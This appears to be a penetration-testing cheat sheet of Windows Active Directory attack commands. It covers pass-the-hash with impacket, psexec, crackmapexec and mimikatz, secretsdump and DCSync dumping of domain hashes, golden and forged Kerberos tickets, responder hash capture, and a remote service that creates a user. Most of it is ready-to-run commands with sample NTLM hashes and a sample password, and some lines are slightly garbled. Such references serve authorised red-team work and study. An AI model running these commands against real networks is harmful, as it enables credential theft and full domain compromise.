PASS THE HASH TECHNIQUES
# WMIEXEC
proxychains python /opt/ActiveDirectory/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
# SMBCLIENT
smbclient -U domain/user%hash:hash -n <netbios name> -W <domain> //<ip>/share$
# PTH-WINEXE
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:3fee04b01f59a1001a366a7681e95699 //10.11.1.123 cmd
# PTH-SMBCLIENT
pth-smbclient //CORPDC01/c$ -U corp/user_a%aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d
# CRACKMAPEXEC
crackmapexec <ip> -u user -H <hash>
# MIMIKATZ
privilege::debug
sekurlsa::pth /user:<user> /domain:<domain.com> /ntlm:<hash>
# RDP
xfreerdp /u:admin /d:domain /pth:hash:hash /v:192.168.1.101
# METASPLOIT
use exploit/windows/smb/psexec
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
# PSEXEC
PsExec.exe -accepteula \\ corpsqlserver01 -s -u corp\user_a -p aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d cmd.exe
# IMPACKET SECRETS DUMP
secretsdump.py -just-dc-ntlm –user-status –outputfile | ./NTDSData/CORP/ntds20170711-13.05 -hashes aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d corp/user_a@corpdc01
# USING FOUND PASSWORD
$Passw = ConvertTo-SecureString 'P@ssw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $Passw)
Start-Process C:\Windows\System32\spool\drivers\color\msf.exe -Credential $Cred
Check For Stored Credentials
cmdkey /list
Use Stored Credentials:
runas /user:administrator /savecred "cmd.exe /k whoami"
Access SMB With Credentials:
python /usr/share/doc/python3-impacket/examples/smbclient.py <Domain>/<user>@<ip> -hashes <part1>:<part2>
In Metasploit
use auxiliary/scanner/smb/smb_login
crackmapexec <ip(s)> -d <domain> -u <user> -p <pass>
exploit/windows/smb/psexec
Map A Drive
net use z: \\<ip>\c$ /user:<username> <password>
Gain A Hash
1.) Start responder Be sure to include --lm
responder -I tun0 --lm
2.) Issue dementor to obtain an ntlm response
proxychains python dementor.py -d htb.local -u <user> -p <password> <target ip> <listening ip>
l
METERPRETER KIWI
Get Hash As Domain Admin (kiwi):
dsync_ntlm <domain>\\<user>
Create Golden Ticket (kiwi):
golden_ticket_create -d <domain> -k <krbtgt hash> -s <domain-sid> -u <name, does not have to exist (but can)> -t <filename>
Create Skeleton Ticket With Impacket
python ticketer.py -nthash <hash> -domain-sid <sid> -domain OsbornePro DEV\$
OR
python ticketer.py -nthash <hash> -domain-sid <sid> -domain HTB DEV
OR
python ticketer.py -nthash <hash> -domain-sid <sid> -domain OsbornePro -spn cifs/<ip> <username>
USE THAT CREATED SKELETON TICKET:
1.) Set Value
export KRB5CCNAME=/root/Downloads/Tickets/OsbornePro.cache
2.) Edit krb.conf File
nano /etc/krb5.conf
# CONTENTS
[realms]
DOMAIN.COM = {
kdc = dev.domain.com
kdc = web.domain.com
kdc = dc.domain.com
admin_server = dc.domain.com
}
3.) Connect To Target
proxychains smbclient \\\\<IP>\\C$ -U <user> -C -N
Create A Service To Exploit:
1.) Create A Service To Make A User
python /usr/share/doc/python3-impacket/examples/services.py -dc-ip <ip of domain controller> -k -no-pass <ip of target> create -name <username> -display <username> -path 'net user <username><password> /add'
2.) Check The Service Values
proxychains /usr/share/doc/python3-impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <targetIP> config -name <createduser>
3.) Start The Service To Execute Command
proxychains python /opt/ActiveDirectory/impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <TargetIP> start -name <username>
Use Golden Ticket (kiwi):
kerberos_ticket_use <filename>
Dump Domain Hashes With DCSync:
log
lsadump::dcsync /domain:<domain> /all /csv
Create Golden Ticket Mimikatz:
kerberos::golden /user:<name> /domain: <domain> /sid:<domain-sid> /krbtgt:<krbtgt hash> /ticket:<filename> /groups:<comma seperated groups this 'virtual' user is part of
Use Golden Ticket Mimikatz:
kerberos::ptt <filename>
====================
LINUX
====================
Become another user
su <username>
Become root User:
su -
OR
su root
Execute Command As Root:
sudo <command>
Execute Command As Another User:
sudo -u <username> <command>